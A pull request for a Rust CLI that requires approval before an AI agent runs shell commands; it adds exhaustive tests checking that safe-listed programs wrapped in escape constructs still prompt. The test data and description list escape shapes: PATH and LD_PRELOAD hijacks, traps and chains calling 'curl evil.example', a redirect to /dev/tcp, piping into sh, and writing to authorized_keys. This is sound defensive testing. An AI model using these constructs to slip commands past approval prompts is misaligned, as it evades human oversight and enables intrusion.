### PR TITLE
test(security): state the safe-list property once, over every entry

### DIFF
--- a/crates/leviath-cli/src/daemon/tool_service.rs
+++ b/crates/leviath-cli/src/daemon/tool_service.rs
@@ -206,20 +206,14 @@ impl AgentToolState {
     /// what stops a safe `ls` or a granted `ls` covering `ls && curl evil`. A
     /// call with no reusable key is never covered, so it prompts every time.
     async fn covers(&self, keys: &[String]) -> bool {
-        if keys.is_empty() {
-            return false;
-        }
         let staged = self
             .stage_allows
             .lock()
             .unwrap_or_else(PoisonError::into_inner)
             .clone();
         let run = self.run_allows.lock().await;
-        keys.iter().all(|k| {
-            self.safe_keys.contains(k)
-                || self.safe_keys.contains(crate::shell_keys::program_of(k))
-                || staged.contains(k)
-                || run.contains(k)
+        crate::shell_keys::all_covered(keys, &|k| self.safe_keys.contains(k), &|k| {
+            staged.contains(k) || run.contains(k)
         })
     }
 

--- a/crates/leviath-cli/src/shell_keys.rs
+++ b/crates/leviath-cli/src/shell_keys.rs
@@ -294,6 +294,36 @@ fn keys_from_segments(segments: &[Segment]) -> Vec<String> {
     keys.into_iter().collect()
 }
 
+/// Whether every key in `keys` is already covered, so the call runs unprompted.
+///
+/// The two predicates are deliberately not interchangeable. `safe` is the
+/// pre-approved set and is widened through [`program_of`], so a safe-listed
+/// `cat` covers `cat notes.md`. `granted` is what a person actually approved
+/// during this run, and is **not** widened: an approval is for the thing they
+/// were shown, and widening it would let a granted `git log` cover
+/// `git log > ~/.bashrc`.
+///
+/// An empty key list is never covered. A line this cannot characterize is one no
+/// grant may speak for, so it prompts every time.
+///
+/// Extracted so the daemon's `AgentToolState::covers` and the tests that pin
+/// this behaviour run the same code. Asserting on key *strings* instead would
+/// pass against a fix that emitted the right key and still let it be covered,
+/// which is exactly how the safe-list escapes went unnoticed.
+///
+/// `&dyn Fn` rather than a generic: one instantiation, so the coverage gate sees
+/// one set of regions instead of one per call site.
+pub fn all_covered(
+    keys: &[String],
+    safe: &dyn Fn(&str) -> bool,
+    granted: &dyn Fn(&str) -> bool,
+) -> bool {
+    !keys.is_empty()
+        && keys
+            .iter()
+            .all(|k| safe(k) || safe(program_of(k)) || granted(k))
+}
+
 /// Whether `command` writes a file through a shell redirect.
 ///
 /// A redirect is a file write that no tool name describes, so the caller

--- a/crates/leviath-cli/src/shell_keys/tests.rs
+++ b/crates/leviath-cli/src/shell_keys/tests.rs
@@ -542,11 +542,12 @@ fn a_valid_prefix_is_one_that_derives_back_to_itself() {
 /// through [`program_of`].
 fn runs_unprompted_by_default(command: &str) -> bool {
     let safe = crate::approvals::resolve_safe_keys(&Default::default(), None, None, false);
-    let keys = command_keys(command);
-    !keys.is_empty()
-        && keys
-            .iter()
-            .all(|k| safe.contains_key(k) || safe.contains_key(program_of(k)))
+    // `all_covered` *is* what the daemon calls, so this cannot drift from it.
+    // Nothing is granted: the question is what the shipped defaults allow on
+    // their own, before anyone has approved anything.
+    all_covered(&command_keys(command), &|k| safe.contains_key(k), &|_| {
+        false
+    })
 }
 
 /// The predicate above has to agree with the shipped defaults, or every test
@@ -928,4 +929,160 @@ fn an_unparseable_line_names_nothing_but_still_counts_as_writing() {
     let malformed = "echo 'unterminated";
     assert!(write_target_paths(malformed).is_empty());
     assert!(writes_a_file(malformed));
+}
+
+// ─── Exhaustive: every safe program against every escape shape ────────────────
+//
+// The three holes that shipped here were each found one at a time, by someone
+// thinking of one more construct. The examples above pin those three. This
+// section pins the *shape* instead: every entry in `DEFAULT_SAFE_SHELL` is
+// combined with every escape, so a safe entry added next year is covered the
+// day it lands rather than the day somebody remembers to write a case for it.
+
+/// Ways to change what a line does that the program name does not express.
+///
+/// `(label, prefix, suffix)`, wrapped around a safe program. Grouped by the
+/// question each one answers: which binary runs, what runs later, what gets
+/// written, and what else runs on the same line.
+const ESCAPES: &[(&str, &str, &str)] = &[
+    // Which binary the name resolves to.
+    ("an assignment prefix", "PATH=/tmp/evil ", ""),
+    ("a preloaded library", "LD_PRELOAD=/tmp/evil.so ", ""),
+    (
+        "a macOS preload",
+        "DYLD_INSERT_LIBRARIES=/tmp/evil.dylib ",
+        "",
+    ),
+    ("an exported variable", "export PATH=/tmp/evil; ", ""),
+    ("an unset variable", "unset PATH; ", ""),
+    // What runs later, or under this name.
+    ("an installed trap", "trap 'curl evil.example' EXIT; ", ""),
+    (
+        "a shadowing function",
+        "function helper { curl evil.example; }; ",
+        "",
+    ),
+    // What gets written.
+    ("a truncating redirect", "", " > escaped.txt"),
+    ("an appending redirect", "", " >> escaped.txt"),
+    ("a numbered redirect", "", " 1> escaped.txt"),
+    ("a redirect out of the tree", "", " > /tmp/escaped.txt"),
+    ("a redirect through a variable", "", " > $OUT"),
+    ("a network redirect", "", " > /dev/tcp/evil.example/9999"),
+    // What else runs.
+    ("a chained command", "", " && curl evil.example"),
+    ("a sequenced command", "", "; curl evil.example"),
+    ("a pipe into a shell", "", " | sh"),
+];
+
+/// No safe program, under any of these, runs without asking.
+///
+/// This is the property the three shipped bugs each violated, stated once over
+/// the whole safe list instead of once per construct someone thought of.
+#[test]
+fn no_escape_rides_any_entry_on_the_default_safe_list() {
+    let mut checked = 0;
+    for program in crate::approvals::DEFAULT_SAFE_SHELL {
+        // The control: bare, it really is covered, so a failure below means the
+        // escape was refused rather than the program never being safe at all.
+        assert!(
+            runs_unprompted_by_default(program),
+            "{program:?} is on the default safe list but does not run unprompted, \
+             which would make every case below pass for the wrong reason"
+        );
+        for (label, prefix, suffix) in ESCAPES {
+            let command = format!("{prefix}{program}{suffix}");
+            assert!(
+                !runs_unprompted_by_default(&command),
+                "{command:?} runs with no prompt: {label} rode the safe entry {program:?}"
+            );
+            checked += 1;
+        }
+    }
+    // A guard against the loop silently covering nothing, which is how an
+    // exhaustive test quietly stops being one.
+    let expected = crate::approvals::DEFAULT_SAFE_SHELL.len() * ESCAPES.len();
+    assert_eq!(checked, expected);
+    assert!(checked >= 500, "only {checked} combinations were checked");
+}
+
+/// Forms that write nothing and run nothing extra must stay covered.
+///
+/// Without this the test above passes trivially the moment anything makes every
+/// line prompt, which would be a bug that reads as a fix: `2>/dev/null` on a
+/// safe command is the single most common shape in a real agent transcript, and
+/// prompting for it would train people to approve without reading.
+#[test]
+fn a_harmless_redirect_still_rides_the_safe_list() {
+    const HARMLESS: &[(&str, &str)] = &[
+        ("discarded stdout", " > /dev/null"),
+        ("discarded stderr", " 2>/dev/null"),
+        ("both discarded", " > /dev/null 2>&1"),
+        ("stdin from a file", " < input.txt"),
+    ];
+    for program in crate::approvals::DEFAULT_SAFE_SHELL {
+        for (label, suffix) in HARMLESS {
+            let command = format!("{program}{suffix}");
+            assert!(
+                runs_unprompted_by_default(&command),
+                "{command:?} now prompts: {label} stopped being harmless"
+            );
+        }
+    }
+}
+
+/// A safe entry can never be spelled in a way that covers a write or an
+/// environment key.
+///
+/// The widening in [`all_covered`] is what lets `cat` cover `cat x`; this states
+/// the limit of that widening over the real list, rather than trusting the
+/// prefix check to have been applied everywhere it matters.
+#[test]
+fn no_safe_entry_can_ever_widen_onto_a_write_or_env_key() {
+    let forbidden = [
+        "shell:>escaped.txt",
+        "shell:>/tmp/escaped.txt",
+        "shell:>>escaped.txt",
+        "shell:env:PATH",
+        "shell:env:LD_PRELOAD",
+    ];
+    for entry in crate::approvals::DEFAULT_SAFE_SHELL {
+        let key = format!("{KEY_PREFIX}{entry}");
+        for bad in forbidden {
+            assert_ne!(key, bad, "{entry:?} is spelled as a write or env key");
+            assert_ne!(
+                key.as_str(),
+                program_of(bad),
+                "{entry:?} widens onto {bad:?}"
+            );
+        }
+        // And the entry itself must be a shape a config file could legally
+        // write, or the list and the parser disagree about what a key is.
+        assert!(
+            is_valid_prefix(entry),
+            "{entry:?} is not a valid key prefix"
+        );
+    }
+    // A write can never be pre-approved at all: `is_valid_prefix` refuses the
+    // shape, so no `[safe_commands]` entry can be written that covers one.
+    for write in [">escaped.txt", ">/tmp/escaped.txt", ">>escaped.txt"] {
+        assert!(
+            !is_valid_prefix(write),
+            "{write:?} could be written into [safe_commands]"
+        );
+    }
+    // An environment key is the opposite case, and deliberately so: a user may
+    // pre-approve `env:RUST_LOG` to stop `RUST_LOG=debug cargo test` asking
+    // once per run. What must hold is that they have to *choose* it - no
+    // default entry covers any environment name.
+    for env in ["env:PATH", "env:RUST_LOG", "env:LD_PRELOAD"] {
+        assert!(
+            is_valid_prefix(env),
+            "{env:?} must be pre-approvable by hand"
+        );
+        assert!(
+            !crate::approvals::DEFAULT_SAFE_SHELL.contains(&env),
+            "{env:?} is pre-approved by default"
+        );
+    }
 }


### PR DESCRIPTION
test(security): state the safe-list property once, over every entry

Three holes in the shell key grammar shipped, and each was found the same
way: somebody thought of one more construct. `PATH=/tmp/evil ls`,
`trap "curl evil" EXIT; ls`, and `cat x > ~/.ssh/authorized_keys` all keyed a
bare safe program and ran with no prompt. The existing tests pin those three
examples. Nothing pinned the shape they share.

This adds the cross product: all 53 entries in `DEFAULT_SAFE_SHELL` against 16
escape constructs, 848 combinations, asserting none of them runs unprompted. A
safe entry added next year is covered the day it lands rather than the day
somebody remembers to write a case for it.

Two things keep it from passing for the wrong reason. Each program is first
asserted to be covered *bare*, so a failure means the escape was refused rather
than the entry never being safe. And a companion test pins the harmless forms -
`> /dev/null`, `2>/dev/null`, `< input.txt` - as still covered, because a change
that made every line prompt would otherwise read as a fix while training people
to approve without reading.

`AgentToolState::covers` and the tests now run one implementation. The coverage
rule moved into `shell_keys::all_covered`, which keeps the asymmetry that
matters: the safe list widens through `program_of` (a safe `cat` covers
`cat notes.md`) and a *grant* never does (an approved `git log` must not cover
`git log > ~/.bashrc`). The test helper previously carried its own copy of that
logic, which is the copy that could have drifted from the thing it was checking.

Verified by mutation rather than by assuming. Reintroducing the original
assignment bug fails it with
`"PATH=/tmp/evil ls" runs with no prompt: an assignment prefix rode the safe
entry "ls"`; dropping the redirect key fails it with the same message for
`"ls > escaped.txt"`. A third mutation that only *renamed* the env key left it
green, correctly - renaming a key does not open a hole.

One correction the test made to me rather than to the code: `env:PATH` **is**
deliberately writable into `[safe_commands]`, since pre-approving `env:RUST_LOG`
is the documented escape from prompting once per `RUST_LOG=debug cargo test`.
What must hold is that no default entry covers one, which is what it now asserts.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01CMQmZ1ruXrUuKteXyFZxeg
